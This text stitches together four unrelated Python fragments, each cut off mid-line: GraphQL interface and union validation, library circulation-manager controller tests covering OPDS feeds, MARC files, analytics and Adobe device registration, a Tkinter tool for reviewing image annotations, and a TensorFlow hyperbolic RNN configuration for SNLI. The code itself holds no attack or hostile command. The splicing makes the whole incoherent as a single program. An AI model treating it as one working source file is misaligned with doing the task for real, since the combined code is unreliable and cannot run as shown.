# Assert each interface field is implemented.
for field_name, iface_field in iface_fields.items():
type_field = type_fields.get(field_name)
# Assert interface field exists on object.
if not type_field:
self.report_error(
f"Interface field {iface.name}.{field_name}"
f" expected but {type_.name} does not provide it.",
[
iface_field.ast_node,
type_.ast_node,
*(type_.extension_ast_nodes or ()),
],
)
continue
# Assert interface field type is satisfied by type field type, by being
# a valid subtype (covariant).
if not is_type_sub_type_of(self.schema, type_field.type, iface_field.type):
self.report_error(
f"Interface field {iface.name}.{field_name}"
f" expects type {iface_field.type}"
f" but {type_.name}.{field_name}"
f" is type {type_field.type}.",
[
iface_field.ast_node and iface_field.ast_node.type,
type_field.ast_node and type_field.ast_node.type,
],
)
# Assert each interface field arg is implemented.
for arg_name, iface_arg in iface_field.args.items():
type_arg = type_field.args.get(arg_name)
# Assert interface field arg exists on object field.
if not type_arg:
self.report_error(
"Interface field argument"
f" {iface.name}.{field_name}({arg_name}:)"
f" expected but {type_.name}.{field_name}"
" does not provide it.",
[iface_arg.ast_node, type_field.ast_node],
)
continue
# Assert interface field arg type matches object field arg type
# (invariant).
if not is_equal_type(iface_arg.type, type_arg.type):
self.report_error(
"Interface field argument"
f" {iface.name}.{field_name}({arg_name}:)"
f" expects type {iface_arg.type}"
f" but {type_.name}.{field_name}({arg_name}:)"
f" is type {type_arg.type}.",
[
iface_arg.ast_node and iface_arg.ast_node.type,
type_arg.ast_node and type_arg.ast_node.type,
],
)
# Assert additional arguments must not be required.
for arg_name, type_arg in type_field.args.items():
iface_arg = iface_field.args.get(arg_name)
if not iface_arg and is_required_argument(type_arg):
self.report_error(
f"Object field {type_.name}.{field_name} includes"
f" required argument {arg_name} that is missing from"
f" the Interface field {iface.name}.{field_name}.",
[type_arg.ast_node, iface_field.ast_node],
)
def validate_type_implements_ancestors(
self,
type_: Union[GraphQLObjectType, GraphQLInterfaceType],
iface: GraphQLInterfaceType,
) -> None:
type_interfaces, iface_interfaces = type_.interfaces, iface.interfaces
for transitive in iface_interfaces:
if transitive not in type_interfaces:
self.report_error(
f"Type {type_.name} cannot implement {iface.name}"
" because it would create a circular reference."
if transitive is type_
else f"Type {type_.name} must implement {transitive.name}"
f" because it is implemented by {iface.name}.",
get_all_implements_interface_nodes(iface, transitive)
+ get_all_implements_interface_nodes(type_, iface),
)
def validate_union_members(self, union: GraphQLUnionType) -> None:
member_types = union.types
if not member_types:
self.report_error(
f"Union type {union.name} must define one or more member types.",
[union.ast_node, *(union.extension_ast_nodes or ())],
)
included_type_names: Set[str] = set()
for member_type in member_types:
if is_object_type(member_type):
if member_type.name in included_type_names:
self.report_error(
f"Union type {union.name} can only | |
proper Response object is the job of the real
# _crawlable_feed.
eq_("An OPDS feed.", response)
# Verify that _crawlable_feed was called with the right arguments.
kwargs = self._crawlable_feed_called_with
eq_(expect_url, kwargs.pop('url'))
eq_(customlist.name, kwargs.pop('title'))
eq_(None, kwargs.pop('annotator'))
eq_(AcquisitionFeed, kwargs.pop('feed_class'))
# A CrawlableCustomListBasedLane was created to fetch only
# the works in the custom list.
lane = kwargs.pop('worklist')
assert isinstance(lane, CrawlableCustomListBasedLane)
eq_([customlist.id], lane.customlist_ids)
eq_({}, kwargs)
def test__crawlable_feed(self):
# Test the helper method called by all other feed methods.
self.page_called_with = None
class MockFeed(object):
@classmethod
def page(cls, **kwargs):
self.page_called_with = kwargs
return Response("An OPDS feed")
work = self._work(with_open_access_download=True)
class MockLane(DynamicLane):
def works(self, _db, facets, pagination, *args, **kwargs):
# We need to call page_loaded() (normally called by
# the search engine after obtaining real search
# results), because OPDSFeed.page will call it if it
# wasn't already called.
#
# It's not necessary for this test to call it with a
# realistic value, but we might as well.
results = [
MockSearchResult(
work.sort_title, work.sort_author, {}, work.id
)
]
pagination.page_loaded(results)
return [work]
mock_lane = MockLane()
mock_lane.initialize(None)
in_kwargs = dict(
title="Lane title",
url="Lane URL",
worklist=mock_lane,
feed_class=MockFeed
)
# Bad pagination data -> problem detail
with self.app.test_request_context("/?size=a"):
response = self.manager.opds_feeds._crawlable_feed(**in_kwargs)
assert isinstance(response, ProblemDetail)
eq_(INVALID_INPUT.uri, response.uri)
eq_(None, self.page_called_with)
# Bad search engine -> problem detail
self.assert_bad_search_index_gives_problem_detail(
lambda: self.manager.opds_feeds._crawlable_feed(**in_kwargs)
)
# Good pagination data -> feed_class.page() is called.
sort_key = ["sort", "pagination", "key"]
with self.app.test_request_context(
"/?size=23&key=%s" % json.dumps(sort_key)
):
response = self.manager.opds_feeds._crawlable_feed(**in_kwargs)
# The result of page() was served as an OPDS feed.
eq_(200, response.status_code)
eq_("An OPDS feed", response.data)
# Verify the arguments passed in to page().
out_kwargs = self.page_called_with
eq_(self._db, out_kwargs.pop('_db'))
eq_(self.manager.opds_feeds.search_engine,
out_kwargs.pop('search_engine'))
eq_(in_kwargs['worklist'], out_kwargs.pop('worklist'))
eq_(in_kwargs['title'], out_kwargs.pop('title'))
eq_(in_kwargs['url'], out_kwargs.pop('url'))
# Since no annotator was provided and the request did not
# happen in a library context, a generic
# CirculationManagerAnnotator was created.
annotator = out_kwargs.pop('annotator')
assert isinstance(annotator, CirculationManagerAnnotator)
eq_(mock_lane, annotator.lane)
# There's only one way to configure CrawlableFacets, so it's
# sufficient to check that our faceting object is in fact a
# CrawlableFacets.
facets = out_kwargs.pop('facets')
assert isinstance(facets, CrawlableFacets)
# Verify that pagination was picked up from the request.
pagination = out_kwargs.pop('pagination')
assert isinstance(pagination, SortKeyPagination)
eq_(sort_key, pagination.last_item_on_previous_page)
eq_(23, pagination.size)
# We're done looking at the arguments.
eq_({}, out_kwargs)
# If a custom Annotator is passed in to _crawlable_feed, it's
# propagated to the page() call.
mock_annotator = object()
with self.app.test_request_context("/"):
response = self.manager.opds_feeds._crawlable_feed(
annotator=mock_annotator, **in_kwargs
)
eq_(mock_annotator, self.page_called_with['annotator'])
# Finally, remove the mock feed class and verify that a real OPDS
# feed is generated from the result of MockLane.works()
del in_kwargs['feed_class']
with self.request_context_with_library("/"):
response = self.manager.opds_feeds._crawlable_feed(**in_kwargs)
feed = feedparser.parse(response.data)
# There is one entry with the expected title.
[entry] = feed['entries']
eq_(entry['title'], work.title)
class TestMARCRecordController(CirculationControllerTest):
def test_download_page_with_exporter_and_files(self):
now = datetime.datetime.now()
yesterday = now - datetime.timedelta(days=1)
library = self._default_library
lane = self._lane(display_name="Test Lane")
exporter = self._external_integration(
ExternalIntegration.MARC_EXPORT, ExternalIntegration.CATALOG_GOAL,
libraries=[self._default_library])
rep1, ignore = create(
self._db, Representation,
url="http://mirror1", mirror_url="http://mirror1",
media_type=Representation.MARC_MEDIA_TYPE,
mirrored_at=now)
cache1, ignore = create(
self._db, CachedMARCFile,
library=self._default_library, lane=None,
representation=rep1, end_time=now)
rep2, ignore = create(
self._db, Representation,
url="http://mirror2", mirror_url="http://mirror2",
media_type=Representation.MARC_MEDIA_TYPE,
mirrored_at=yesterday)
cache2, ignore = create(
self._db, CachedMARCFile,
library=self._default_library, lane=lane,
representation=rep2, end_time=yesterday)
rep3, ignore = create(
self._db, Representation,
url="http://mirror3", mirror_url="http://mirror3",
media_type=Representation.MARC_MEDIA_TYPE,
mirrored_at=now)
cache3, ignore = create(
self._db, CachedMARCFile,
library=self._default_library, lane=None,
representation=rep3, end_time=now,
start_time=yesterday)
with self.request_context_with_library("/"):
response = self.manager.marc_records.download_page()
eq_(200, response.status_code)
html = response.data
assert ("Download MARC files for %s" % library.name) in html
assert "<h3>All Books</h3>" in html
assert '<a href="http://mirror1">Full file - last updated %s</a>' % now.strftime("%B %-d, %Y") in html
assert "<h4>Update-only files</h4>" in html
assert '<a href="http://mirror3">Updates from %s to %s</a>' % (yesterday.strftime("%B %-d, %Y"), now.strftime("%B %-d, %Y")) in html
assert '<h3>Test Lane</h3>' in html
assert '<a href="http://mirror2">Full file - last updated %s</a>' % yesterday.strftime("%B %-d, %Y") in html
def test_download_page_with_exporter_but_no_files(self):
now = datetime.datetime.now()
yesterday = now - datetime.timedelta(days=1)
library = self._default_library
exporter = self._external_integration(
ExternalIntegration.MARC_EXPORT, ExternalIntegration.CATALOG_GOAL,
libraries=[self._default_library])
with self.request_context_with_library("/"):
response = self.manager.marc_records.download_page()
eq_(200, response.status_code)
html = response.data
assert ("Download MARC files for %s" % library.name) in html
assert "MARC files aren't ready" in html
def test_download_page_no_exporter(self):
library = self._default_library
with self.request_context_with_library("/"):
response = self.manager.marc_records.download_page()
eq_(200, response.status_code)
html = response.data
assert ("Download MARC files for %s" % library.name) in html
assert ("No MARC exporter is currently configured") in html
# If the exporter was deleted after some MARC files were cached,
# they will still be available to download.
now = datetime.datetime.now()
rep, ignore = create(
self._db, Representation,
url="http://mirror1", mirror_url="http://mirror1",
media_type=Representation.MARC_MEDIA_TYPE,
mirrored_at=now)
cache, ignore = create(
self._db, CachedMARCFile,
library=self._default_library, lane=None,
representation=rep, end_time=now)
with self.request_context_with_library("/"):
response = self.manager.marc_records.download_page()
eq_(200, response.status_code)
html = response.data
assert ("Download MARC files for %s" % library.name) in html
assert "No MARC exporter is currently configured" in html
assert '<h3>All Books</h3>' in html
assert '<a href="http://mirror1">Full file - last updated %s</a>' % now.strftime("%B %-d, %Y") in html
class TestAnalyticsController(CirculationControllerTest):
def setup(self):
super(TestAnalyticsController, self).setup()
[self.lp] = self.english_1.license_pools
self.identifier = self.lp.identifier
def test_track_event(self):
integration, ignore = create(
self._db, ExternalIntegration,
goal=ExternalIntegration.ANALYTICS_GOAL,
protocol="core.local_analytics_provider",
)
integration.setting(
LocalAnalyticsProvider.LOCATION_SOURCE
).value = LocalAnalyticsProvider.LOCATION_SOURCE_NEIGHBORHOOD
self.manager.analytics = Analytics(self._db)
with self.request_context_with_library("/"):
response = self.manager.analytics_controller.track_event(self.identifier.type, self.identifier.identifier, "invalid_type")
eq_(400, response.status_code)
eq_(INVALID_ANALYTICS_EVENT_TYPE.uri, response.uri)
# If there is no active patron, or if the patron has no
# associated neighborhood, the CirculationEvent is created
# with no location.
patron = self._patron()
for request_patron in (None, patron):
with self.request_context_with_library("/"):
flask.request.patron = request_patron
response = self.manager.analytics_controller.track_event(
self.identifier.type, self.identifier.identifier,
"open_book"
)
eq_(200, response.status_code)
circulation_event = get_one(
self._db, CirculationEvent,
type="open_book",
license_pool=self.lp
)
eq_(None, circulation_event.location)
self._db.delete(circulation_event)
# If the patron has an associated neighborhood, and the
# analytics controller is set up to use patron neighborhood as
# event location, then the CirculationEvent is created with
# that neighborhood as its location.
patron.neighborhood = "Mars Grid 4810579"
with self.request_context_with_library("/"):
flask.request.patron = patron
response = self.manager.analytics_controller.track_event(
self.identifier.type, self.identifier.identifier, "open_book"
)
eq_(200, response.status_code)
circulation_event = get_one(
self._db, CirculationEvent,
type="open_book",
license_pool=self.lp
)
eq_(patron.neighborhood, circulation_event.location)
self._db.delete(circulation_event)
class TestDeviceManagementProtocolController(ControllerTest):
def setup(self):
super(TestDeviceManagementProtocolController, self).setup()
self.initialize_adobe(self.library, self.libraries)
self.auth = dict(Authorization=self.valid_auth)
# Since our library doesn't have its Adobe configuration
# enabled, the Device Management Protocol controller has not
# been enabled.
eq_(None, self.manager.adobe_device_management)
# Set up the Adobe configuration for this library and
# reload the CirculationManager configuration.
self.manager.setup_adobe_vendor_id(self._db, self.library)
self.manager.load_settings()
# Now the controller is enabled and we can use it in this
# test.
self.controller = self.manager.adobe_device_management
def _create_credential(self):
"""Associate a credential with the default patron which
can have Adobe device identifiers associated with it,
"""
return self._credential(
DataSource.INTERNAL_PROCESSING,
AuthdataUtility.ADOBE_ACCOUNT_ID_PATRON_IDENTIFIER,
self.default_patron
)
def test_link_template_header(self):
"""Test the value of the Link-Template header used in
device_id_list_handler.
"""
with self.request_context_with_library("/"):
headers = self.controller.link_template_header
eq_(1, len(headers))
template = headers['Link-Template']
expected_url = url_for("adobe_drm_device", library_short_name=self.library.short_name, device_id="{id}", _external=True)
expected_url = expected_url.replace("%7Bid%7D", "{id}")
eq_('<%s>; rel="item"' % expected_url, template)
def test__request_handler_failure(self):
"""You cannot create a DeviceManagementRequestHandler
without providing a patron.
"""
result = self.controller._request_handler(None)
assert isinstance(result, ProblemDetail)
eq_(INVALID_CREDENTIALS.uri, result.uri)
eq_("No authenticated patron", result.detail)
def test_device_id_list_handler_post_success(self):
# The patron has no credentials, and thus no registered devices.
eq_([], self.default_patron.credentials)
headers = dict(self.auth)
headers['Content-Type'] = self.controller.DEVICE_ID_LIST_MEDIA_TYPE
with self.request_context_with_library(
"/", method='POST', headers=headers, data="device"
):
self.controller.authenticated_patron_from_request()
response = self.controller.device_id_list_handler()
eq_(200, response.status_code)
# We just registered a new device with the patron. This
# automatically created an appropriate Credential for
# them.
[credential] = self.default_patron.credentials
eq_(DataSource.INTERNAL_PROCESSING, credential.data_source.name)
eq_(AuthdataUtility.ADOBE_ACCOUNT_ID_PATRON_IDENTIFIER,
credential.type)
eq_(['device'],
[x.device_identifier for x in credential.drm_device_identifiers]
)
def test_device_id_list_handler_get_success(self):
credential = self._create_credential()
credential.register_drm_device_identifier("device1")
credential.register_drm_device_identifier("device2")
with self.request_context_with_library("/", headers=self.auth):
self.controller.authenticated_patron_from_request()
response = self.controller.device_id_list_handler()
eq_(200, response.status_code)
# We got a list of device IDs.
eq_(self.controller.DEVICE_ID_LIST_MEDIA_TYPE,
response.headers['Content-Type'])
eq_("device1\ndevice2", response.data)
# We got a URL Template (see test_link_template_header())
# that explains how to address any particular device ID.
expect = self.controller.link_template_header
for k, v in expect.items():
assert response.headers[k] == v
def device_id_list_handler_bad_auth(self):
with self.request_context_with_library("/"):
self.controller.authenticated_patron_from_request()
response = self.manager.adobe_vendor_id.device_id_list_handler()
assert isinstance(response, ProblemDetail)
eq_(401, response.status_code)
def device_id_list_handler_bad_method(self):
with self.request_context_with_library(
"/", method='DELETE', headers=self.auth
):
self.controller.authenticated_patron_from_request()
response = self.controller.device_id_list_handler()
assert isinstance(response, ProblemDetail)
eq_(405, response.status_code)
def test_device_id_list_handler_too_many_simultaneous_registrations(self):
"""We only allow registration of one device ID at a time."""
headers = dict(self.auth)
headers['Content-Type'] = self.controller.DEVICE_ID_LIST_MEDIA_TYPE
with self.request_context_with_library(
"/", method='POST', headers=headers, data="device1\ndevice2"
):
self.controller.authenticated_patron_from_request()
response = self.controller.device_id_list_handler()
eq_(413, response.status_code)
eq_("You | |
import glob
import os
import sys
import tkinter as tk
from tkinter import messagebox
from xml.etree import ElementTree
import cv2
import numpy as np
import pandas as pd
from PIL import Image, ImageTk
from utils import annotator
FOLDER_PATH = 'purifier/folders.pkl'
def get_folders():
"""
read all trial folders and return a dataframe
:return: dataframe
"""
# get the list of all folders
folders_path = sorted(glob.glob("data/Original-data/belvedere/*"))
# Create a dic to hold number of invalid images per folder
f_dic = {}
for path in folders_path:
f_dic[path] = 0
# Get the invalid images
# invalid_images = glob.glob("data/Original-data/*/*/*.jpg_")
# loop over all invalid images and +1 to the folder
# for img in invalid_images:
# t = img.split("/")
# f_path = '/'.join(t[:-1])
# f_dic[f_path] += 1
# make a data frame from dic
# f_list = [[k, v] for k, v in f_dic.items()]
folder_df = pd.DataFrame(data=folders_path, columns=["folder"])
folder_df["checked"] = False
#
# folder_df = folder_df.sort_values(["invalids"], ascending=False)
# folder_df.reset_index(inplace=True)
folder_df.to_pickle(FOLDER_PATH)
for i, row in folder_df.iterrows():
print(row.folder)
return folder_df
def get_dataframe(_path):
"""
get a path and read images and labels (xmls) from current directory
:param _path: directory path
:return: a dataframe
"""
all_images = sorted(glob.glob(_path + "/*.bmp"))
all_xmls = sorted(glob.glob(_path + "/*.xml"))
data = []
for i, img in enumerate(all_images):
vals = read_xml(all_xmls[i])
# add image number to sort the dataframe based on it
name = img.split("/")[-1]
num = name.split(".")[0]
num = int(num[:-2])
data.append([img, vals[0], vals[1], vals[2], vals[3], vals[4], num])
df = pd.DataFrame(data=data, columns=["path", "xt", "yt", "wt", "ht", "angt", "num"])
df = df.sort_values(["num"])
df.reset_index(inplace=True)
df["status"] = 0
return df
def read_xml(xml_path):
e = ElementTree.parse(xml_path).getroot()
x = np.float32(e[0].text)
y = np.float32(e[1].text)
w = np.float32(e[2].text)
h = np.float32(e[3].text)
a = np.float32(e[4].text)
return [x, y, w, h, a]
def numpy2pil(np_array: np.ndarray) -> Image:
"""
convert an HxWx3 numpy array into an RGB Image
:param np_array: input numpy array
:return: A PIL Image object
"""
assert_mfg = "input shall be a HxWx3 ndarray"
assert isinstance(np_array, np.ndarray), assert_mfg
assert np.ndim(np_array) == 3, assert_mfg
assert np_array.shape[2] == 3, assert_mfg
img = Image.fromarray(np_array, 'RGB')
return img
class inspector_gui:
def __init__(self, master, data):
self.frame = tk.Frame(master)
self.frame.pack_propagate(0)
self.frame.pack(fill=tk.BOTH, expand=1)
# Folder index
self.f_idx = 0
self.folder_df = data
self.n_folders = len(data)
self.current_df = None
self.n_img = 0
self.current_df_dirty = False
# folder navigation
self.prev_folder_btn = tk.Button(self.frame, text="previous Folder", command=lambda: self.change_folder(-1))
self.prev_folder_btn.place(width=140, height=30, x=20, y=5)
self.path_lbl = tk.Label(self.frame, text="Image path: ", anchor=tk.CENTER)
self.path_lbl.place(width=380, height=20, x=200, y=5)
self.next_folder_btn = tk.Button(self.frame, text="next Folder", command=lambda: self.change_folder(1))
self.next_folder_btn.place(width=140, height=30, x=640, y=5)
# big labeled image
self.canvas = tk.Canvas(self.frame, width=576, height=576, bg="yellow")
self.canvas.place(width=576, height=576, x=12, y=40)
img = Image.open("0in.jpg")
self.photo = ImageTk.PhotoImage(img)
self.image_ref = self.canvas.create_image((288, 288), image=self.photo)
# thumbsnail image
self.canvas_s = tk.Canvas(self.frame, width=192, height=192)
self.canvas_s.place(width=192, height=192, x=596, y=40)
self.photo_s = ImageTk.PhotoImage(img)
self.image_refs = self.canvas_s.create_image((96, 96), image=self.photo_s)
self.pager_lbl = tk.Label(self.frame, text="0/1234", anchor=tk.CENTER)
self.pager_lbl.place(width=192, height=20, x=596, y=225)
self.status_lbl = tk.Label(self.frame, text="0", anchor=tk.CENTER, font=("Courier", 34))
self.status_lbl.place(width=192, height=40, x=596, y=255)
# true false buttons
self.incorrect_btn = tk.Button(self.frame, text="Incorrect (i)", bg="red", command=lambda: self.updateDF(2))
self.incorrect_btn.place(width=80, height=40, x=610, y=410)
self.correct_btn = tk.Button(self.frame, text="correct (c)", bg="green", command=lambda: self.updateDF(1))
self.correct_btn.place(width=80, height=40, x=700, y=410)
# back and forward buttons for images
self.backButton = tk.Button(self.frame, text="<- back", command=lambda: self.updateIndex(-1))
self.backButton.place(width=80, height=30, x=610, y=470)
self.nextButton = tk.Button(self.frame, text="next ->", command=lambda: self.updateIndex(1))
self.nextButton.place(width=80, height=30, x=700, y=470)
# capture image and save dataframe buttons
self.capture_btn = tk.Button(self.frame, text="Capture (p)", command=self.capture)
self.capture_btn.place(width=80, height=30, x=610, y=530)
self.save_btn = tk.Button(self.frame, text="save", command=self.saveDF)
self.save_btn.place(width=80, height=30, x=700, y=530)
# export and rename buttons
self.export_btn = tk.Button(self.frame, text="export path", command=self.exportPath)
self.export_btn.place(width=80, height=30, x=700, y=580)
self.rename_btn = tk.Button(self.frame, text="rename path", command=self.file_renamer)
self.rename_btn.place(width=80, height=30, x=610, y=580)
# bind events with keyboard
master.bind('<Left>', self.leftKey)
master.bind('<Right>', self.rightKey)
master.bind('i', self.enterKey)
master.bind('c', self.spaceKey)
master.bind('p', self.captureKey)
# select the first folder as start point
self.goto_folder(0)
def rightKey(self, event):
self.updateIndex(1)
def leftKey(self, event):
self.updateIndex(-1)
def spaceKey(self, event):
self.updateDF(1)
def enterKey(self, event):
self.updateDF(2)
def captureKey(self, event):
self.capture()
def findNextIndex(self):
"""
loop over dataframe and return an index with status 0
if not found, alert and return index= 0
:return:
"""
status_0 = self.current_df.index[self.current_df["status"] == 0].tolist()
status_0 = sorted(status_0)
if len(status_0) == 0:
status_1 = self.current_df.index[self.current_df["status"] == 1].tolist()
status_1 = sorted(status_1)
if len(status_1) == 0:
return self.goto_folder(1)
else:
return status_1[0]
else:
return status_0[0]
def capture(self):
row = self.current_df.iloc[self.img_index]
img = cv2.imread(row.path, cv2.IMREAD_GRAYSCALE)
truth = [row.xt, row.yt, row.wt, row.ht, row.angt]
# Update the labeled image
img = annotator((0, 250, 0), img, *truth) # Green
save_path = row.path.replace("/", "-")
cv2.imwrite("purifier/" + save_path, img)
def change_folder(self, val):
"""
update the folder index and clip it between 0 and n_folders
:param val: +1 go next, -1 go previous
:return: updated folder_idx
"""
if self.current_df_dirty:
res = messagebox.askquestion("Save Data", "Did you save the data?", icon='warning')
if res == 'no':
return
self.f_idx += val
self.f_idx = np.clip(self.f_idx, 0, self.n_folders - 1)
self.goto_folder(self.f_idx)
def goto_folder(self, idx):
"""
Get the path from folder data frame. We should check if the upcomming folder
has already a dataframe for its images. if not, create one.
:param idx: index of current folder to be shown
"""
# get the row of current path
row = self.folder_df.iloc[idx]
# check if dataframe is already exist
df_name = row.folder.replace("/", "_")
df_path = "purifier/" + df_name + ".pkl"
if os.path.exists(df_path):
self.current_df = pd.read_pickle(df_path)
else:
# read all images and labels in current directory
self.current_df = get_dataframe(row.folder)
# reset the image index
self.img_index = self.findNextIndex()
self.n_img = len(self.current_df)
# update the folder name label
new_text = "{0}".format(row.folder)
self.path_lbl.configure(text=new_text)
self.current_df_dirty = False
# finally update GUI with new data
self.updateGUI()
def exportPath(self):
"""
export path of images which flaged as incorrect
:return:
"""
incorrects = self.current_df[self.current_df.status == 2]
path_txt = []
# loop over rows and extract the paths
for i, row in incorrects.iterrows():
path_txt.append(row.path + "\n")
# save file
f_row = self.folder_df.iloc[self.f_idx]
export_path = f_row.folder + "/incorrects.txt"
open(export_path, mode='w').writelines(path_txt)
# corrects = self.df[self.df.status == 1]
# with open(CHECKED_PATH, mode='a') as f:
# for i, row in corrects.iterrows():
# path = row.trial + "/" + row.img_id + "\n"
# f.writelines(path)
messagebox.showinfo("Export path", "incorrect paths exported successfuly at {}".format(export_path))
def updateDF(self, val):
"""
update the status of current row and go to next image
:return:
"""
self.current_df.at[self.img_index, "status"] = val
r = self.current_df.iloc[self.img_index]
print("{0} has been marked as {1}".format(r.path, r.status))
self.current_df_dirty = True
self.updateIndex(1)
def saveDF(self):
"""
save incorrect labeled images into a file
:return:
"""
# get the row of current path
row = self.folder_df.iloc[self.f_idx]
# check if dataframe is already exist
df_name = row.folder.replace("/", "_")
df_path = "purifier/"+df_name+".pkl"
try:
self.current_df.to_pickle(df_path)
except IOError:
print("IO Error")
except RuntimeError:
print("RuntimeError")
except EOFError:
print("EOFError")
except OSError:
print("OSError")
except:
print("Unexpected error:", sys.exc_info()[0])
self.current_df_dirty = False
messagebox.showinfo("save data", "Data saved successfuly at {}".format(df_path))
def updateIndex(self, val):
"""
update the image index and clip between 0, len(n_img). finally update the GUI
:param val:
:return:
"""
self.img_index += val
self.img_index = np.clip(self.img_index, 0, self.n_img - 1)
self.updateGUI()
def updateGUI(self):
"""
update the GUI based on img_index
:return:
"""
row = self.current_df.iloc[self.img_index]
# update pager
new_text = "{0}/{1}".format(self.img_index + 1, self.n_img)
self.pager_lbl.configure(text=new_text)
# update status
self.status_lbl.configure(text=str(row.status))
# update image holder
# load image
file = row.path.split(".")[0]
file = file + ".bmp"
if row.status == 2:
img = cv2.imread(file, cv2.IMREAD_GRAYSCALE)
else:
img = cv2.imread(file, cv2.IMREAD_GRAYSCALE)
# update thumbnails before manipulation
s_img = np.asarray(img, dtype=np.uint8)
s_img = Image.fromarray(s_img, 'L')
self.photo_s = ImageTk.PhotoImage(image=s_img)
self.canvas_s.itemconfig(self.image_refs, image=self.photo_s)
# resize image 3x and put label on it
img = cv2.resize(img, (576, 576))
truth = [row.xt * 3, row.yt * 3, row.wt * 3, row.ht * 3, row.angt]
img = annotator((0, 250, 0), img, *truth) # Green
img = numpy2pil(img)
self.photo = ImageTk.PhotoImage(image=img)
self.canvas.itemconfig(self.image_ref, image=self.photo)
def file_renamer(self):
"""
get the file path of miss labeled data, and read the paths inside the file,
and rename the extension part to jpg_ and xml_
:param file_path: list of bad-labeled images
:return:
"""
f_row = self.folder_df.iloc[self.f_idx]
export_path = f_row.folder + "/incorrects.txt"
counter = 0
with open(export_path, mode='r') as f:
for line in f:
line = line.strip()
root = line.split(".")[0]
os.rename(root + ".jpg", root + ".jpg_")
xml = root.replace("in.", "gt.")
| |
<gh_stars>0
import os
import logging
import numpy as np
import tensorflow as tf
import pickle
import time
import random
import math
import matplotlib.pyplot as plt
from datetime import datetime
from random import shuffle
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"
logging.getLogger("tensorflow").setLevel(logging.CRITICAL)
import util
import rnn_impl
cell_type = 'rnn'
geom = 'hyp'
hyp_opt = "rsgd"
lr_ffnn = 0.01
lr_words = 0.1
# batch_size = 64
dtype = tf.float64
# Project setup
num_classes = 2
word_to_id_file_path = os.path.join('snli_dataset/','word_to_id')
id_to_word_file_path = os.path.join('snli_dataset/','id_to_word')
suffix = '_' + str(num_classes) + 'class'
training_data_file_path = os.path.join('snli_dataset/','train' + suffix)
test_data_file_path = os.path.join('snli_dataset/', 'test' + suffix)
dev_data_file_path = os.path.join('snli_dataset/', 'dev' + suffix)
PROJ_EPS = 1e-5
util.PROJ_EPS = PROJ_EPS
dataset = "SNLI"
c_val = 1.0
# FFNN params: id/relu/tanh/sigmoid
cell_non_lin = 'id'
ffnn_non_lin = 'id'
word_init_avg_norm = 0.001
additional_features = "dsq"
dropout = 1.0
sent_geom = geom
inputs_geom = geom
bias_geom = geom
ffnn_geom = geom
mlr_geom = geom
fix_biases = 'n'
fix_biases_str = ''
fix_matrices = 'n'
matrices_init_eye = 'n'
mat_str = ''
# Optimization params
burnin = 'n'
# L2 regularization
reg_beta = 0.0
if inputs_geom == 'hyp' or bias_geom == 'hyp' or ffnn_geom =='hyp' or mlr_geom == 'hyp':
hyp_opt_str = hyp_opt + '_lrW' + str(lr_words) + '_lrFF' + str(lr_ffnn) + '_'
else:
hyp_opt_str = ''
if c_val != 1.0:
c_str = 'C' + str(c_val) + '_'
else:
c_str = ''
if dropout != 1.0:
drp_str = 'drp' + str(dropout) + '_'
else:
drp_str = ''
burnin_str = ''
if burnin:
burnin_str = 'burn' + str(burnin).lower()
reg_beta_str = ''
if reg_beta > 0.0:
reg_beta_str = 'reg' + str(reg_beta) + '_'
additional_features_str = additional_features
if additional_features != '':
additional_features_str = additional_features + '_'
now = datetime.now()
name_experiment = 'demo_colab_group_20'
logger = util.setup_logger(name_experiment+now.strftime("_%Y-%m%d-%Hh%Mm%Ss")+'.txt', logs_dir='logs/', also_stdout=True)
logger.info('PARAMS : ' + name_experiment)
class HyperbolicRNNModel:
def __init__(self, word_to_id, id_to_word, dim, batch_size, embeddings = None):
self.word_to_id = word_to_id
self.id_to_word = id_to_word
self.dim = dim
self.batch_size = batch_size
self.embeddings_np = None if embeddings is None else np.array(embeddings)
self.construct_placeholders()
self.construct_execution_graph()
def construct_placeholders(self):
self.label_placeholder = tf.placeholder(tf.int32,
shape=[self.batch_size],
name='label_placeholder')
self.word_ids_1 = tf.placeholder(tf.int32, shape=[self.batch_size, None],
name='word_ids_1_placeholder')
self.word_ids_2 = tf.placeholder(tf.int32, shape=[self.batch_size, None],
name='word_ids_2_placeholder')
self.num_words_1 = tf.placeholder(tf.int32, shape=[self.batch_size],
name='num_words_1_placeholder')
self.num_words_2 = tf.placeholder(tf.int32, shape=[self.batch_size],
name='num_words_2_placeholder')
self.burn_in_factor = tf.placeholder(dtype, name='burn_in_factor_placeholder')
self.dropout_placeholder = tf.placeholder(dtype, name='dropout_placeholder')
if not (self.embeddings_np is None):
self.embeddings_placeholder = tf.placeholder(dtype, shape = self.embeddings_np.shape,
name = 'embeddings_placeholder')
###############################################################################################
def construct_execution_graph(self):
# Collect vars separately. Word embeddings are not used here.
eucl_vars = []
hyp_vars = []
################## word embeddings ###################
# Initialize word embeddings close to 0, to have average norm equal to word_init_avg_norm.
if not (self.embeddings_np is None):
self.embeddings = tf.get_variable(name = 'embeddings',
dtype = dtype,
shape = self.embeddings_np.shape,
trainable = True,
initializer = tf.constant_initializer(self.embeddings_np))
else:
maxval = (3. * (word_init_avg_norm ** 2) / (2. * self.dim)) ** (1. / 3)
initializer = tf.random_uniform_initializer(minval=-maxval, maxval=maxval, dtype=dtype)
self.embeddings = tf.get_variable('embeddings',
dtype=dtype,
shape=[len(self.word_to_id), self.dim],
initializer=initializer)
if inputs_geom == 'eucl':
eucl_vars += [self.embeddings]
################## RNNs for sentence embeddings ###################
if cell_type == 'TFrnn':
assert sent_geom == 'eucl'
cell_class = lambda h_dim: tf.contrib.rnn.BasicRNNCell(h_dim)
elif cell_type == 'TFgru':
assert sent_geom == 'eucl'
cell_class = lambda h_dim: tf.contrib.rnn.GRUCell(h_dim)
elif cell_type == 'TFlstm':
assert sent_geom == 'eucl'
cell_class = lambda h_dim: tf.contrib.rnn.BasicLSTMCell(h_dim)
elif cell_type == 'rnn' and sent_geom == 'eucl':
cell_class = lambda h_dim: rnn_impl.EuclRNN(h_dim, dtype=dtype)
elif cell_type == 'gru' and sent_geom == 'eucl':
cell_class = lambda h_dim: rnn_impl.EuclGRU(h_dim, dtype=dtype)
elif cell_type == 'rnn' and sent_geom == 'hyp':
cell_class = lambda h_dim: rnn_impl.HypRNN(num_units=h_dim,
inputs_geom=inputs_geom,
bias_geom=bias_geom,
c_val=c_val,
non_lin=cell_non_lin,
fix_biases=fix_biases,
fix_matrices=fix_matrices,
matrices_init_eye=matrices_init_eye,
dtype=dtype)
